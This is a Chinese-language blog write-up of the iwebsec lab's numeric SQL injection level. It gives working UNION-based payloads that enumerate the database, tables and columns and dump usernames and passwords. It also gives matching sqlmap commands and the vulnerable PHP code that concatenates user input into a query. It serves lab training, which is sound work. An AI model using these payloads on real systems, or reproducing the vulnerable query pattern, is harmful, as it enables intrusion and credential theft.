首页 > 数据库 >iwebsec-sql注入 01 数字型注入

iwebsec-sql注入 01 数字型注入

时间:2023-08-18 18:14:03浏览次数:51  
标签:www 01 cn 数字型 sqli bdrwmy iwebsec id 注入

01、题目分析

数字型注入的sql语句

select * from news where id=$id;

最最最常规的,直接注入

02、手工注入:

先判断有多少列

http://www.bdrwmy.cn:8001/sqli/01.php?id=1 order by 3
-- id=-1就是不显示内容
http://www.bdrwmy.cn:8001/sqli/01.php?id=-1 union select 1,2,3

image

知道有多少列了,接下来判断数据库

http://www.bdrwmy.cn:8001/sqli/01.php?id=-1 union select 1,2,database()

image

知道数据库名称了,接下来就可以爆表

http://www.bdrwmy.cn:8001/sqli/01.php?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='iwebsec'

image

爆列

http://www.bdrwmy.cn:8001/sqli/01.php?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='sqli'

image

爆数据

http://www.bdrwmy.cn:8001/sqli/01.php?id=-1 union select 1,2,group_concat(concat_ws('~',username,password)) from iwebsec.sqli

image

收工

03、sqlmap工具注入:

判断能否注入:

 python .\sqlmap.py -u "http://www.bdrwmy.cn:8001/sqli/01.php?id=1"

image

能注入,暴库

 python .\sqlmap.py -u "http://www.bdrwmy.cn:8001/sqli/01.php?id=1"  --dbs

image

暴表

python .\sqlmap.py -u "http://www.bdrwmy.cn:8001/sqli/01.php?id=1"  --tables  -D iwebsec

image

暴字段

python .\sqlmap.py -u "http://www.bdrwmy.cn:8001/sqli/01.php?id=1"  -T sqli  -D iwebsec  --columns

image

暴数据

python .\sqlmap.py -u "http://www.bdrwmy.cn:8001/sqli/01.php?id=1"  -T sqli  -D iwebsec  -C "username,password" --dump

image

04、代码分析

<?php
  if(isset($_GET['id'])){
    $id=$_GET['id'];
	
	$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";
    # 这就是最简单的sql语句拼接,输入值会进入到id中,因此可以实现sql注入
		$result=mysql_query($sql);
	}
  else{
	exit();
  }
?>

标签:www,01,cn,数字型,sqli,bdrwmy,iwebsec,id,注入
From: https://www.cnblogs.com/bdrwmy/p/17638300.html

相关文章

  • burpsuite靶场----SQL注入13----oracle的CAST报错注入
    burpsuite靶场----SQL注入13----oracle的CAST报错注入靶场地址https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based正式开始1.通过在TrackingId=JBhlRizkqfo87Hq8后面添加'和''(两个单引号)猜测是oracle数据库添加'报错,添加''......
  • burpsuite靶场----SQL注入14----oracle的时间盲注test
    burpsuite靶场----SQL注入14----oracle的时间盲注test靶场地址https://portswigger.net/web-security/sql-injection/blind/lab-time-delays正式开始1.进入标签2.抓包3.在TrackingId=BU622TbcJXbso7Wwh后面填上'||pg_sleep(10)--完成任务......
  • burpsuite靶场----SQL注入12----oracle的布尔盲注
    burpsuite靶场----SQL注入12----oracle的布尔盲注靶场地址https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors正式开始1.找到注入点为cookie中的TrackingId2.因为oracle使用||进行连接的所以先判断闭合payload:TrackingId=7zHLwisTii2Zhhp......
  • Prism IoC 依赖注入
    现有2个项目,SinglePageApp是基于Prism创建的WPF项目,框架使用的是Prism.DryIoc,SinglePageApp.Services是C#类库,包含多种服务,下面通过使用Prism中的依赖注入方式,将自定义的服务注册到SinglePageApp项目中。 1.认识Prism中的依赖注入Prism项目中的App继承于PrismAppl......
  • SQL注入中#、--+、--%20、%23的含义
    1.GET请求中这两个可以作为注释使用,来保证使后面的语句不被执行。在url中,如果是get请求,url中的#是用来知道浏览器动作的,对服务器端无效,所以HTTP请求中不包括#,因此使用#闭合无法注释,会报错。而使用--(有个空格)在传输过程中空格也会被忽略,导致无法注释,所以在get请求传参注入时才......
  • 黑客入侵路径之sql注入实践预防
    ​         记得那天晚上大概11点,准备去与周公约会之前。听到手机屏幕发出阵阵“催命”的响声,预感不秒,不知哪个客户的服务器估计中招了。        睡前极其不愿意接到这种电话,接起来的那一刻就意味着晚上估计得熬夜,头上稀疏的毛发,又要跟我闹意见了,它的价值可以......
  • ctfshow-web入门-sql注入-SELECT模块
    title:ctfshow-web入门-sql注入-SELECT模块date:2023-08-1322:06:17categories:web刷题记录description:web171~web172基础知识缺乏的推荐看我的sqli-labs系列web171单引号包裹,思路很简单。先看多少列1'ORDERBY3--+确定三列查看回显1'UNIONSELECT1,2,3--+......
  • Hytec Inter HWL-2511-SS popen.cgi命令注入漏洞
    页面是以下这个屌样 poc/cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137921 ......
  • spring注入bean错误-Bean named 'abc' is expected to be of type 'AAA' but was actu
    先看如下两个注入到spring容器中的bean,一个是UserNewManager,一个是UserManager。@ServicepublicclassUserNewManager{publicvoiddoSomething(){}}@ServicepublicclassUserManager{...}再看下面的testcase,利用@Resource注解来注入bean。@......
  • SQL注入-mysql绕过函数注入
    1.判断注入点通过测试发现,这里过滤了空格和等于号。所以咱们用/**/代替空格,用like代替=,最后将构造的语句进行url编码,使用的是小葵转化工具。所以咱们构造如下语句。//and//1//like//1结果如下图,页面正常显示。接着咱们再构造如下语句。/**/and/**/1/**/like/**/2发现页面报错,说明存......